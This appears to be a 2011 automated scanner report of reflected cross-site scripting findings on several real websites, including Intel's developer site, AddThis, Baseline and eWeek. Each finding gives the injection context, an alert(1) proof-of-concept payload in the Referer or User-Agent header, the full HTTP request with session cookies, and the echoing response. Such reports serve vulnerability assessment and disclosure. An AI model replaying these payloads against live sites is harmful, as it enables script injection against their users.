This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/challenge HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296945247431; s_cc=true; has_js=1; SESS5a5e2306769d28180c45e44dbead8572=5e9e534eeb2970f37ac9ef725e396b00; _chartbeat2=7eetxrpbruuu11xx; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; cf=1;
Referer: http://www.google.com/search?hl=en&q=95846"-alert(1)-"09f37818470
Response (redirected)
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 22:48:20 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:48:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... veloper Challenge"; var wa_eCustom24 = ""; var wa_eCustom28="http://appdeveloper.intel.com/en-us/contest/developerchallenge";
var wa_custom11="http://www.google.com/search?hl=en&q=95846"-alert(1)-"09f37818470";
var wa_urlQueryString=""; var wa_reportSuites="intelappdeveloper,intelcorpsw"; var wa_trackDFA="n";
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5700"-alert(1)-"94552111633 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/join HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a5700"-alert(1)-"94552111633
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 21:51:12 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=f06d1ac0a36c5756f7a59d2610c9cc22; expires=Tue, 01-Mar-2011 01:24:31 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 21:51:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]...
var wa_custom43="User|Join|home"; var wa_eCustom24 = ""; var wa_eCustom28="http://appdeveloper.intel.com/en-us/join";
var wa_custom11="http://www.google.com/search?hl=en&q=a5700"-alert(1)-"94552111633";
var wa_urlQueryString=""; var wa_reportSuites="intelappdeveloper,intelcorpsw"; var wa_trackDFA="n";
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce49"><script>alert(1)</script>b71393fda3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9ce49"><script>alert(1)</script>b71393fda3d
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:05:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=9ce49"><script>alert(1)</script>b71393fda3d" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c9be4<script>alert(1)</script>267a9949814 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c9be4<script>alert(1)</script>267a9949814
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 16:05:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>c9be4<script>alert(1)</script>267a9949814 - Google search</h4> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9910"><script>alert(1)</script>a834ad17d4e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.arto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b9910"><script>alert(1)</script>a834ad17d4e
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=t3lqid2f5pl1cnycigzwhgb4; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:01:58 GMT
Connection: close
Content-Length: 69448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... <input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b9910"><script>alert(1)</script>a834ad17d4e" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9cbb'-alert(1)-'d9026def35b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v/ HTTP/1.1
Host: www.au2m8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.218CKOWJ; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1296950890=1296947290; bpl1296950921=1296947321; videoID=expired; bpl1296950936=1296947336; j2playlist=5731; auto=expired; bpl1296950967=1296947367; playlist=5731;
Referer: http://www.google.com/search?hl=en&q=e9cbb'-alert(1)-'d9026def35b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e676e'-alert(1)-'4f05ce07561 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v/index.php HTTP/1.1
Host: www.au2m8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bpl1296950982=1296947382; countryID=us; ARPT=NQJKKYS192.168.100.219CKOWU; bpl1296950951=1296947351; bpl1296950905=1296947305; bpl1297002333=1296998733; bpl1296950890=1296947290; bpl1296950921=1296947321; bpl1297002238=1296998638; bpl1297002318=1296998718; videoID=expired; bpl1297002302=1296998702; bpl1297002287=1296998687; bpl1296950936=1296947336; j2playlist=4881; auto=expired; bpl1296950967=1296947367; playlist=5731%2C4881; bpl1297002348=1296998748;
Referer: http://www.google.com/search?hl=en&q=e676e'-alert(1)-'4f05ce07561
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40d83"-alert(1)-"2d8f5a16807 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.baselinemag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06;
Referer: http://www.google.com/search?hl=en&q=40d83"-alert(1)-"2d8f5a16807
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f3f"-alert(1)-"9628bc32550 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc32f"-alert(1)-"364a56e431a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ HTTP/1.1
Host: www.baselinemag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cc32f"-alert(1)-"364a56e431a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d3d"-alert(1)-"dc60051143 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/&hl=en&client=ca-pub-6422417422167576&adU=www.RiminiStreet.com&adT=ImageAd&gl=US&usg=AFQjCNH5RnMJStR1tz53GbCMllXhLJ0M_g/ HTTP/1.1
Host: www.baselinemag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06;
Referer: http://www.google.com/search?hl=en&q=92d3d"-alert(1)-"dc60051143
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sun, 06 Feb 2011 16:05:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.1.6
Content-Length: 3983
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97a19"-alert(1)-"670bb88e8f4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /googlecse.html HTTP/1.1
Host: www.baselinemag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06;
Referer: http://www.google.com/search?hl=en&q=97a19"-alert(1)-"670bb88e8f4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adad6"-alert(1)-"5522cfd1d64 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9677"-alert(1)-"60c757f6c00 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665e0"-alert(1)-"9deb9b12562 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spacer.gif HTTP/1.1
Host: www.baselinemag.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=665e0"-alert(1)-"9deb9b12562
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessioncookie=a3c496ee62329678ad4d9915421e3c06; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_cc=true; s_nr=1296998523669-New; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sun, 06 Feb 2011 13:21:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Content-Length: 3792
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9016"-alert(1)-"130c26df728 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Web-Services-Web-20-and-SOA/Smarter-Enterprise-and-NextGeneration-Web-Services/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b9016"-alert(1)-"130c26df728
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sun, 06 Feb 2011 16:07:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.1.6
Content-Length: 3798
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e14"-alert(1)-"988ac6d4176 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b8e14"-alert(1)-"988ac6d4176
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56392"><script>alert(1)</script>cfd30f8fce5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=56392"><script>alert(1)</script>cfd30f8fce5
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf53"><script>alert(1)</script>366b0773325 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fbf53"><script>alert(1)</script>366b0773325
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9546b"-alert(1)-"7d7d000f081 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9546b"-alert(1)-"7d7d000f081
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f75d4"-alert(1)-"705dae51c79 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f75d4"-alert(1)-"705dae51c79
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b85"><script>alert(1)</script>dbf3a60c943 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=65b85"><script>alert(1)</script>dbf3a60c943
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f65"-alert(1)-"c511ed18c94 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/ HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0f65"-alert(1)-"c511ed18c94
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f10f0"><script>alert(1)</script>01bad51f7bd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
